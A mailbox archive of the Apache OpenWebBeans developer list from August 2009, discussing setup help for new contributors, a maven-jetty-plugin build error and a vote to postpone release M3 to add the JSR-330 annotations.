<[email protected]> Date: Tue, 18 Aug 2009 06:20:45 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: Preparing for Release M3 To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org Hi and welcome aboard! The jetty plugin should work out of the box, Greg deploys it to the maven central repo. But we should upgrade to the latest version anyway ;) The specification: Gavin posted a new version yesterday: http://markmail.org/message/mcooxuqqpx5qz7k2 This version contains the JSR-330 annotations. @Gurkan: this was faster as expected, should we postpone M3 and implement this now? I'd prefer, so +1. This should be (sic!) the last large change to the JSR-299 spec, so I'd prefer hacking it into M3. The version which has been used to code the current OWB is from 20090610: http://markmail.org/message/gbh6qryxxqpeonus LieGrue, strub ----- Original Message ---- > From: Gurkan Erdogdu <[email protected]> > To: [email protected] > Sent: Tuesday, August 18, 2009 12:04:27 AM > Subject: Re: Preparing for Release M3 > > Hi Paul; > > Thanks for trying to help. > > >>>Is it possible you have a local copy of maven-jetty-plugin? > I removed maven-jetty-plugin from my local repository, then re-execute mvn > commands. Maven try to get plugin > from the below locations. > > [INFO] Scanning for projects... > [INFO] Searching repository for plugin with prefix: 'jetty'. > Downloading: > http://repo1.maven.org/maven2/org/mortbay/jetty/maven-jetty-plugin/6.1.18/maven-jetty-plugin-6.1.18.pom > 5K downloaded > Downloading: > http://repo1.maven.org/maven2/org/mortbay/jetty/maven-jetty-plugin/6.1.18/maven-jetty-plugin-6.1.18.jar > 46K downloaded > > >>>Are all current work items in jira OWB? Are there some we can help with? > Yes. We are planning to release M3 version. But some of the issues under M3 > may propagate to M4 version. > FYI, JSR-299 specification talks about heavy Java EE containers for some of > its functionality. But instead OWB works in Jetty, Tomcat etc. light weight > containers. But it also supports Embeddable OpenEJB in Tomcat. > > You can pick any of the issue from the JIRA, > https://issues.apache.org/jira/browse/OWB. Currenlty we are trying to > support resource injection for managed beans in Embeddable OpenEJB. > (OWB-47). All jira issues explains themselves. If you have further question > about them, you are always welcome to ask in this dev list. We are also > running IRC@freenode with channel name #openwebbeans. > > >>>What is the procedure to set up an environment to run the tests and do > development > >>>using eclipse? (i.e. what libs/levels need to be installed, are there > project files we can import to generate a >>>standard dev env, etc) > We are generally use Eclipse for development with Maven Plugin. After you > check out all of the source codes from SVN, use Eclipse Import Maven Project > facility. That is it, you can begin development. Lots of tests are located > in the src/main/test folders. You can run junit test from Eclipse or using > mvn test. > > There is also samples directory. In it, you can find several full-blown web > samples. For example, > > guess --> Simple web application using OWB > Run it with : mvn clean install -Pjetty; mvn jetty:run > -Pjetty; > > ejb-sample --> Shows usage of the OpenEJB within Tomcat. First of all, you > have to install OpenEJB in Tomcat. You can look at the > http://openejb.apache.org/tomcat.html for installation. After that put > "openwebbeans-api.jar" into the tomcat server library (apache-folder/lib). > Then deploy it into the ejb-sample.war to the tomcat "webapps/" folder > (apache-folder/webapps). Currently we have no configuration to use examples > via Tomcat Maven Plugin. There is also one trick to use MyFaces with Tomcat, > put "jasper.jar" and "jasper-el.jar" to the WEB-INF folder of the > application. I can not run application without this trick under Tomcat. You > can directly export war from Eclipse Export War functionality. But, you must > put jasper jars in it. > > jms-sample --> Shows the usage of JMS injections. It uses server JNDI > functionality to get JMS ConnectionFactory etc. I tried it on several > application servers. It requires full blown application servers or JMS > configured lightweight containers. If you look at > "src/main/resource/META-INF" folder, you see a file named with > openwebbeans.properties. It defines several properties for overriding > default configuration. OWB uses some default configuration for its services. > You can find default configuration properties and their explanations from > "webbeans-impl" project. jms-sample currently uses "ConnectionFactory" as > JMS Connection Factory JNDI name. You can override it in > openwebbeans.properties with property name > > #JMS ConnectionFactory JNDI Name > org.apache.webbeans.spi.JNDIService.jmsConnectionFactoryJndi=ConnectionFactory. > > You can deploy it via war file. There is no currently maven deployer for it. > > reservation -->Full blown JSF + JPA + OWB sample. You can test it like guess > sample > mvn jetty:run -Pjetty; > > >>> What are the current plans for handling the separation of JSR-330 and > update the open web beans code to >>>accommodate the changes? > As I am in the EG of JSR-299, for the time being there is no more change in > JSR 299. There are some couple of name changes so far. We will work on these > changes after the final spec is arrived. We will also implement JSR-330 on > top of OWB. > > >>>Will we be making OWB dependency injection pluggable so folks can pick > whatever implementation they want or >>>will we be linking it in directly > (regardless of whether we write or obtain the code)? > Yes, OWB will fully implement specification of JSR-299, so anyone that uses > JSR-299 API can changes its underliyng implementation without changing > single line of code. But as I said, currentlty, we do not support any > specific JAva EE container and no integration. You can use any lightweight > JSP/Servlet container to use OWB. If you wish to use embeddable EJB support, > you can also try to use OpenEJB TOmcat with OWB. > > There are lots of areas that you can help. It is documented in the JIRA. We > are also happy to get any comments from your side. > > All of your contributions are welcome :) > > > Thanks; > > --Gurkan > > > 2009/8/17 Paul J. Reder > > > I've been trying, along with a couple of co-workers, to import OpenWebBeans > > into an eclipse environment and run the tests. I've encountered the > > mentioned issue: > > > > [ERROR] BUILD ERROR > > [INFO] > > ------------------------------------------------------------------------ > > [INFO] The plugin 'org.apache.maven.plugins:maven-jetty-plugin' does not > > exist or no valid version could be found > > > > when running: > > > > mvn jetty:run -Pjetty > > > > after having checked out the latest svn trunk and run: > > > > mvn clean install > > mvn clean package -Pjetty > > > > Is it possible you have a local copy of maven-jetty-plugin? > > > > We'd love to start helping with OpenWebBeans development, but we could > > really use some help getting a working environment set up and figuring out > > what we can do to help. > > > > - Are all current work items in jira OWB? Are there some we can help with? > > - What is the procedure to set up an environment to run the tests and do > > development > > using eclipse? (i.e. what libs/levels need to be installed, are there > > project files we can import to generate a standard dev env, etc) > > - What are the current plans for handling the separation of JSR-330 and > > update the open web beans code to accommodate the changes? > > - Will we be making OWB dependency injection pluggable so folks can pick > > whatever implementation they want or will we be linking it in directly > > (regardless of whether we write or obtain the code)? > > > > If you can help us get started, we'd love to help. > > > > Paul J. Reder > > > > > > > > On 08/16/2009 04:58 PM, Gurkan Erdogdu wrote: > > > >> > >> PS: I had problems starting the guess sample with mvn clean package > >>>> -Pjetty jetty run. Need to fix a few things in maven-scm now, and will look > >>>> at it on>>thuesday. gn8! > >>>> > >>> > >> I have separated guess/ project into three different modules > >> > >> guess --> for guess sample, removing ejb and jms parts > >> > >> ejb-sample --> using OpenEJB in Tomcat. Have to configure Tomcat with > >> OpenEJB firstly. Then deploy it into Tomcat. It does not work on any other > >> containers like Jetty. > >> > >> jms-sample --> jms injections. Have to deploy it into full blown Java EE > >> server supporting JMS provider. JMS sample currently using > >> "ConnectionFactory" as JMS Connection Factory JNDI. You can also change this > >> with respect to application server JMS JNDI name policy via > >> openwebbeans.properties > >> > >> I run mvn clean package -Pjetty and mvn jetty:run -Pjetty. It works for > >> me. > >> > >> Please ensure that, you check in all recent changes from the svn, and > >> > >> mvn clean install from root folder. > >> > >> Thanks; > >> > >> --Gurkan > >> > >> ----- Original Message ---- > >> > >>> From: Gurkan Erdogdu > >>> To: [email protected] > >>> Sent: Sunday, August 16, 2009 10:18:13 PM > >>> Subject: Preparing for Release M3 > >>> > >>> Hi guys; > >>> > >>> I want to release M3 in this week to include EJB functionality and couple > >>> of bug > >>> fixes. Also adding more documentation. > >>> > >>> WDYT? > >>> > >>> Thanks; > >>> > >>> --Gurkan > >>> > >> > >> > >> > >> > > -- > > Paul J. Reder > > ----------------------------------------------------------- > > "The strength of the Constitution lies entirely in the determination of > > each > > citizen to defend it. Only if every single citizen feels duty bound to do > > his share in this defense are the constitutional rights secure." > > -- Albert Einstein > > > > > > > -- > Gurkan Erdogdu > http://gurkanerdogdu.blogspot.com From [email protected] Tue Aug 18 06:34:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46332 invoked from network); 18 Aug 2009 06:34:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Aug 2009 06:34:20 -0000 Received: (qmail 87534 invoked by uid 500); 18 Aug 2009 06:34:39 -0000 Delivered-To: [email protected] Received: (qmail 87519 invoked by uid 500); 18 Aug 2009 06:34:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87509 invoked by uid 99); 18 Aug 2009 06:34:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Aug 2009 06:34:39 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f209.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 18 Aug 2009 06:33:35 +0000 Received: by ewy5 with SMTP id 5so278950ewy.12 for <[email protected]>; Mon, 17 Aug 2009 23:33:15 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=p7FRetQ19uK5ak11R/Fizg9nuinA4+k8J3e/aAMGCgs=; b=mpcnfzgXKOaLuc42TnbePqSXrVAbC1hdlLNuV9eZWwoBO0D4qaXemUQ5td9BkMMj1J 5I2t7EPpwVPXsI6JSlpBBW3ei5EK6tnVa3A21Ch/ZJdp8rzUfSPGwYizgmBtQK8wjoat umvaYQZsK5lBibF2zZHcvqZUmCT2KQbgVMFh0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=QPxwMTWdk8WRblkyxIk5A9EigzjC5X1P29+PeRGHoHdzSGxoRKXTljAU1IgmiASk7X eInJF5aXo4U4h8XoJY2mL0P84JhnebEic29roF+iReczP9tB6r6M9gy33M1cJZdjuXaq mCAGiLLC8EKrcyD0tAZ5QDe7m2sALb+V9VGcU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id j10mr1430593ebj.90.1250577194901; Mon, 17 Aug 2009 23:33:14 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Tue, 18 Aug 2009 09:33:14 +0300 Message-ID: <[email protected]> Subject: Re: Preparing for Release M3 From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c0e2277614e047164b101 X-Virus-Checked: Checked by ClamAV on apache.org --0015174c0e2277614e047164b101 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit >>>@Gurkan: this was faster as expected, should we postpone M3 and implement this now? I did not read the latest specification in detailed. But I think that some couples of annotation are changed. We definitely put those changes into the M3 release. Thanks; --Gurkan 2009/8/18 Mark Struberg <[email protected]> > Hi and welcome aboard! > > The jetty plugin should work out of the box, Greg deploys it to the maven > central repo. > But we should upgrade to the latest version anyway ;) > > The specification: Gavin posted a new version yesterday: > http://markmail.org/message/mcooxuqqpx5qz7k2 > This version contains the JSR-330 annotations. > > @Gurkan: this was faster as expected, should we postpone M3 and implement > this now? > I'd prefer, so +1. This should be (sic!) the last large change to the > JSR-299 spec, so I'd prefer hacking it into M3. > > The version which has been used to code the current OWB is from 20090610: > http://markmail.org/message/gbh6qryxxqpeonus > > LieGrue, > strub > > > > > ----- Original Message ---- > > From: Gurkan Erdogdu <[email protected]> > > To: [email protected] > > Sent: Tuesday, August 18, 2009 12:04:27 AM > > Subject: Re: Preparing for Release M3 > > > > Hi Paul; > > > > Thanks for trying to help. > > > > >>>Is it possible you have a local copy of maven-jetty-plugin? > > I removed maven-jetty-plugin from my local repository, then re-execute > mvn > > commands. Maven try to get plugin > > from the below locations. > > > > [INFO] Scanning for projects... > > [INFO] Searching repository for plugin with prefix: 'jetty'. > > Downloading: > > > http://repo1.maven.org/maven2/org/mortbay/jetty/maven-jetty-plugin/6.1.18/maven-jetty-plugin-6.1.18.pom > > 5K downloaded > > Downloading: > > > http://repo1.maven.org/maven2/org/mortbay/jetty/maven-jetty-plugin/6.1.18/maven-jetty-plugin-6.1.18.jar > > 46K downloaded > > > > >>>Are all current work items in jira OWB? Are there some we can help > with? > > Yes. We are planning to release M3 version. But some of the issues under > M3 > > may propagate to M4 version. > > FYI, JSR-299 specification talks about heavy Java EE containers for some > of > > its functionality. But instead OWB works in Jetty, Tomcat etc. light > weight > > containers. But it also supports Embeddable OpenEJB in Tomcat. > > > > You can pick any of the issue from the JIRA, > > https://issues.apache.org/jira/browse/OWB. Currenlty we are trying to > > support resource injection for managed beans in Embeddable OpenEJB. > > (OWB-47). All jira issues explains themselves. If you have further > question > > about them, you are always welcome to ask in this dev list. We are also > > running IRC@freenode with channel name #openwebbeans. > > > > >>>What is the procedure to set up an environment to run the tests and do > > development > > >>>using eclipse? (i.e. what libs/levels need to be installed, are there > > project files we can import to generate a >>>standard dev env, etc) > > We are generally use Eclipse for development with Maven Plugin. After you > > check out all of the source codes from SVN, use Eclipse Import Maven > Project > > facility. That is it, you can begin development. Lots of tests are > located > > in the src/main/test folders. You can run junit test from Eclipse or > using > > mvn test. > > > > There is also samples directory. In it, you can find several full-blown > web > > samples. For example, > > > > guess --> Simple web application using OWB > > Run it with : mvn clean install -Pjetty; mvn jetty:run > > -Pjetty; > > > > ejb-sample --> Shows usage of the OpenEJB within Tomcat. First of all, > you > > have to install OpenEJB in Tomcat. You can look at the > > http://openejb.apache.org/tomcat.html for installation. After that put > > "openwebbeans-api.jar" into the tomcat server library > (apache-folder/lib). > > Then deploy it into the ejb-sample.war to the tomcat "webapps/" folder > > (apache-folder/webapps). Currently we have no configuration to use > examples > > via Tomcat Maven Plugin. There is also one trick to use MyFaces with > Tomcat, > > put "jasper.jar" and "jasper-el.jar" to the WEB-INF folder of the > > application. I can not run application without this trick under Tomcat. > You > > can directly export war from Eclipse Export War functionality. But, you > must > > put jasper jars in it. > > > > jms-sample --> Shows the usage of JMS injections. It uses server JNDI > > functionality to get JMS ConnectionFactory etc. I tried it on several > > application servers. It requires full blown application servers or JMS > > configured lightweight containers. If you look at > > "src/main/resource/META-INF" folder, you see a file named with > > openwebbeans.properties. It defines several properties for overriding > > default configuration. OWB uses some default configuration for its > services. > > You can find default configuration properties and their explanations from > > "webbeans-impl" project. jms-sample currently uses "ConnectionFactory" as > > JMS Connection Factory JNDI name. You can override it in > > openwebbeans.properties with property name > > > > #JMS ConnectionFactory JNDI Name > > > org.apache.webbeans.spi.JNDIService.jmsConnectionFactoryJndi=ConnectionFactory. > > > > You can deploy it via war file. There is no currently maven deployer for > it. > > > > reservation -->Full blown JSF + JPA + OWB sample. You can test it like > guess > > sample > > mvn jetty:run -Pjetty; > > > > >>> What are the current plans for handling the separation of JSR-330 and > > update the open web beans code to >>>accommodate the changes? > > As I am in the EG of JSR-299, for the time being there is no more change > in > > JSR 299. There are some couple of name changes so far. We will work on > these > > changes after the final spec is arrived. We will also implement JSR-330 > on > > top of OWB. > > > > >>>Will we be making OWB dependency injection pluggable so folks can pick > > whatever implementation they want or >>>will we be linking it in directly > > (regardless of whether we write or obtain the code)? > > Yes, OWB will fully implement specification of JSR-299, so anyone that > uses > > JSR-299 API can changes its underliyng implementation without changing > > single line of code. But as I said, currentlty, we do not support any > > specific JAva EE container and no integration. You can use any > lightweight > > JSP/Servlet container to use OWB. If you wish to use embeddable EJB > support, > > you can also try to use OpenEJB TOmcat with OWB. > > > > There are lots of areas that you can help. It is documented in the JIRA. > We > > are also happy to get any comments from your side. > > > > All of your contributions are welcome :) > > > > > > Thanks; > > > > --Gurkan > > > > > > 2009/8/17 Paul J. Reder > > > > > I've been trying, along with a couple of co-workers, to import > OpenWebBeans > > > into an eclipse environment and run the tests. I've encountered the > > > mentioned issue: > > > > > > [ERROR] BUILD ERROR > > > [INFO] > > > > ------------------------------------------------------------------------ > > > [INFO] The plugin 'org.apache.maven.plugins:maven-jetty-plugin' does > not > > > exist or no valid version could be found > > > > > > when running: > > > > > > mvn jetty:run -Pjetty > > > > > > after having checked out the latest svn trunk and run: > > > > > > mvn clean install > > > mvn clean package -Pjetty > > > > > > Is it possible you have a local copy of maven-jetty-plugin? > > > > > > We'd love to start helping with OpenWebBeans development, but we could > > > really use some help getting a working environment set up and figuring > out > > > what we can do to help. > > > > > > - Are all current work items in jira OWB? Are there some we can help > with? > > > - What is the procedure to set up an environment to run the tests and > do > > > development > > > using eclipse? (i.e. what libs/levels need to be installed, are there > > > project files we can import to generate a standard dev env, etc) > > > - What are the current plans for handling the separation of JSR-330 and > > > update the open web beans code to accommodate the changes? > > > - Will we be making OWB dependency injection pluggable so folks can > pick > > > whatever implementation they want or will we be linking it in directly > > > (regardless of whether we write or obtain the code)? > > > > > > If you can help us get started, we'd love to help. > > > > > > Paul J. Reder > > > > > > > > > > > > On 08/16/2009 04:58 PM, Gurkan Erdogdu wrote: > > > > > >> > > >> PS: I had problems starting the guess sample with mvn clean package > > >>>> -Pjetty jetty run. Need to fix a few things in maven-scm now, and > will look > > >>>> at it on>>thuesday. gn8! > > >>>> > > >>> > > >> I have separated guess/ project into three different modules > > >> > > >> guess --> for guess sample, removing ejb and jms parts > > >> > > >> ejb-sample --> using OpenEJB in Tomcat. Have to configure Tomcat with > > >> OpenEJB firstly. Then deploy it into Tomcat. It does not work on any > other > > >> containers like Jetty. > > >> > > >> jms-sample --> jms injections. Have to deploy it into full blown Java > EE > > >> server supporting JMS provider. JMS sample currently using > > >> "ConnectionFactory" as JMS Connection Factory JNDI. You can also > change this > > >> with respect to application server JMS JNDI name policy via > > >> openwebbeans.properties > > >> > > >> I run mvn clean package -Pjetty and mvn jetty:run -Pjetty. It works > for > > >> me. > > >> > > >> Please ensure that, you check in all recent changes from the svn, and > > >> > > >> mvn clean install from root folder. > > >> > > >> Thanks; > > >> > > >> --Gurkan > > >> > > >> ----- Original Message ---- > > >> > > >>> From: Gurkan Erdogdu > > >>> To: [email protected] > > >>> Sent: Sunday, August 16, 2009 10:18:13 PM > > >>> Subject: Preparing for Release M3 > > >>> > > >>> Hi guys; > > >>> > > >>> I want to release M3 in this week to include EJB functionality and > couple > > >>> of bug > > >>> fixes. Also adding more documentation. > > >>> > > >>> WDYT? > > >>> > > >>> Thanks; > > >>> > > >>> --Gurkan > > >>> > > >> > > >> > > >> > > >> > > > -- > > > Paul J. Reder > > > ----------------------------------------------------------- > > > "The strength of the Constitution lies entirely in the determination of > > > each > > > citizen to defend it. Only if every single citizen feels duty bound to > do > > > his share in this defense are the constitutional rights secure." > > > -- Albert Einstein > > > > > > > > > > > > -- > > Gurkan Erdogdu > > http://gurkanerdogdu.blogspot.com > > > > > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174c0e2277614e047164b101-- From [email protected] Wed Aug 19 23:40:24 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64496 invoked from network); 19 Aug 2009 23:40:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Aug 2009 23:40:23 -0000 Received: (qmail 37104 invoked by uid 500); 19 Aug 2009 23:40:42 -0000 Delivered-To: [email protected] Received: (qmail 37074 invoked by uid 500); 19 Aug 2009 23:40:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37064 invoked by uid 99); 19 Aug 2009 23:40:42 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 19 Aug 2009 23:40:42 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27802.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 19 Aug 2009 23:40:30 +0000 Received: (qmail 59354 invoked by uid 60001); 19 Aug 2009 23:40:09 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1250725209; bh=QP8K0YMnutp3N8hylwEM74D6HPyIgqFkQnyTMqZb6uM=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=tG9FzWJcyZLyfretb9dZzCRdaYQvo1Wd/FYiW4aodzWu2TZ6t2S8v+UYg2+rK3L24wocb65ak+RkshIiNrebYMDsd0IoH7sNtDTTMZEY2ftZsm9URB/evv9OmMqA6wH8Vz6p5mw+xgPOK7fUjp4VqRd+qW8qdEV0PDqef9M25HU= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=uI/W318d9sLeXquWGo2gxayew1CRP7v/DxOpDMTYpPY9jUd9vraoHhgj+SXNbomcX2DzkrcJGpQlEnYSZGKUay5i3xVqrJ3AF34j50bffaK4cOkVUhJ6TbMzT9E/PYSwPOHi3jV/Y/cWxBHrlhf2cNLQ9cEDvLO9Gb0U4+edVBk=; Message-ID: <[email protected]> X-YMail-OSG: CQG0Um4VM1mgmr7xg2WDiO15eb6CCdj_4G99J5VuqzHzV6LS4nqXttqu91jtifCdQVKmN_E0dUzItNHqiZoRvcp1TC5OsVAkNUrYs7MoM43KNSI7DpSU7mwbOFVueePu2xz.Pug2vf.RxIigg3oKWYfTkBoOZwXck49nf0ckiqoqDB2vpbtvmuJ2k47tkw5olKkUPouL3O5PHYYvrBm854_nK33z5V5r_URooxQBHLnEGzLv_thssVPFbp8__VGTkS0mUYL.3FzjJ6pGjNNEfv66tmSvXCELTVfZP_NhxZ0.0pmdfVeUOjygS_Xx6wGImBR_Yg-- Received: from [161.129.204.104] by web27802.mail.ukl.yahoo.com via HTTP; Wed, 19 Aug 2009 23:40:09 GMT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.338.2 Date: Wed, 19 Aug 2009 23:40:09 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: postpone of M3 To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org Hi! Gurkan, Jean-Louis and I had a discusson on IRC abouth whether we should wait with the M3 and hack all the new changes from yesterdays spec into it before we do the release. The changes are mainly caused by JSR-330. The JSR-299 spec now additionally depends on the JSR-330 @Inject specification. To satisfy this requirement, I'd suggest to introduce a new package 'atinject-api' which may later be moved to geronimo-specs (clarified this with David Jencks and David Blevins). This new package should contain onle the few annotations defined in JSR-330. It currently will get the openwebbeans-parent as all other OWB modules. The following annotations are part of this module javax.inject.Inject javax.inject.Qualifier javax.inject.Named javax.inject.Scope javax.inject.Singleton The webbeans-api module will get a dependency to this new atinject-api artifact and use that annotations instead of the 'old' WB annotations. The following annotations will be 'replaced' basically: @Current -> @Inject @BindingType -> @Qualifier @ScopeType -> @Scope + @NormalScope (javax.inject.Scope doesn't have the 'normal' and 'passivating' attributes) This is now unclear btw... @Singleton will be a new Scope The atinject-api and webbeans-api should get the openwebbeans-parent for now, and will get geronimo-spec-parent after they have moved. That's it basically :) LieGrue, strub From [email protected] Wed Aug 19 23:45:43 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65582 invoked from network); 19 Aug 2009 23:45:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 19 Aug 2009 23:45:42 -0000 Received: (qmail 45652 invoked by uid 500); 19 Aug 2009 23:46:01 -0000 Delivered-To: [email protected] Received: (qmail 45639 invoked by uid 500); 19 Aug 2009 23:46:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45629 invoked by uid 99); 19 Aug 2009 23:46:01 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 19 Aug 2009 23:46:01 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web27806.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 19 Aug 2009 23:45:51 +0000 Received: (qmail 24287 invoked by uid 60001); 19 Aug 2009 23:45:29 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1250725528; bh=OcNV5GsZ8NecHX4foHKfOWIrjQWujvSnDAHQBXZsfCI=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=Oo3ixEx7NWZcQLtuNW5mc+TxOvgLjcRjchtRzStAbJmiJgP4s5eeq9pjae7TurkZVBUMBx8F2UuUHv3fKZ2EyO+iXCLK/qYVdjlz/Fladk0+m0O1cda86CHuHMi4iTiaO1h0M7K0+Rvbu233jHYi1d55hfuMLSKnsmwsNQYb1gc= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=Fv9d3cMc+OKNRHeYU8R5txcqKL2CulrDRlaRSIhF8Q8fkb/vTRoRjtWszP7BtoIkGJC22Xyn2w9e7HXMcuHMmwGKgqcmTDCh7+LyfzCepC0smgIUlJHwGnc9aLT2Qip+yqb4ecC2MxSelU5NAL4jyYj7ZeojBl2TVi3y+NAsc0o=; Message-ID: <[email protected]> X-YMail-OSG: b_1iozYVM1kdCiKYYOxZErFEPI0H8ECpP9DKo9wTrOmySdhBduGDD6fjeJwPn810RMBzkoEuJupHP5Nb0C0Xf5sCPE1VxYakAtKp9WOmzYUHnCKGwzMZjKevjL1YRkw4dS2ZtfC6FypJ_d9pfAeSQgTrKuBj.pa5l3VZRf_5JDfQm7kFr.75pGMDTyPNIUNWjAWURzUxK4xbQXZUd1hzr0qnxfIkEOeTiKoIKHotWnyB1KBXxFrW1_dJ61RYksVLQ78hiHMLJcpE0RAAUbaYxFqXW3rcP1zoar7NFmWwDV5mQhrENKOCMshxFZUC3qdkroofnAiX.et9Bt9vCfbJTEv.XfiTMritBOwrxn3Z Received: from [161.129.204.104] by web27806.mail.ukl.yahoo.com via HTTP; Wed, 19 Aug 2009 23:45:28 GMT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.338.2 References: <[email protected]> Date: Wed, 19 Aug 2009 23:45:28 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: postpone of M3 To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org Sorry, it's really late here - forgot to call a vote ;) [+1] yes, postpone and hack the JSR-330 changes as quick as possible [0] don't care [-1] no, realease OWB M3 as it currently is +1 aka let's get JSR-330 on board from me LieGrue, strub ----- Original Message ---- > From: Mark Struberg <[email protected]> > To: [email protected] > Sent: Thursday, August 20, 2009 1:40:09 AM > Subject: postpone of M3 > > Hi! > > Gurkan, Jean-Louis and I had a discusson on IRC abouth whether we should wait > with the M3 and hack all the new changes from yesterdays spec into it before we > do the release. The changes are mainly caused by JSR-330. > > The JSR-299 spec now additionally depends on the JSR-330 @Inject specification. > To satisfy this requirement, I'd suggest to introduce a new package > 'atinject-api' which may later be moved to geronimo-specs (clarified this with > David Jencks and David Blevins). This new package should contain onle the few > annotations defined in JSR-330. It currently will get the openwebbeans-parent as > all other OWB modules. > The following annotations are part of this module > javax.inject.Inject > javax.inject.Qualifier > javax.inject.Named > javax.inject.Scope > javax.inject.Singleton > > The webbeans-api module will get a dependency to this new atinject-api artifact > and use that annotations instead of the 'old' WB annotations. > The following annotations will be 'replaced' basically: > @Current -> @Inject > @BindingType -> @Qualifier > @ScopeType -> @Scope + @NormalScope (javax.inject.Scope doesn't have the > 'normal' and 'passivating' attributes) This is now unclear btw... > @Singleton will be a new Scope > > The atinject-api and webbeans-api should get the openwebbeans-parent for now, > and will get geronimo-spec-parent after they have moved. > > That's it basically :) > > LieGrue, > strub From [email protected] Thu Aug 20 09:18:11 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56478 invoked from network); 20 Aug 2009 09:18:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2009 09:18:11 -0000 Received: (qmail 46654 invoked by uid 500); 20 Aug 2009 09:18:30 -0000 Delivered-To: [email protected] Received: (qmail 46648 invoked by uid 500); 20 Aug 2009 09:18:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46600 invoked by uid 99); 20 Aug 2009 09:18:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) 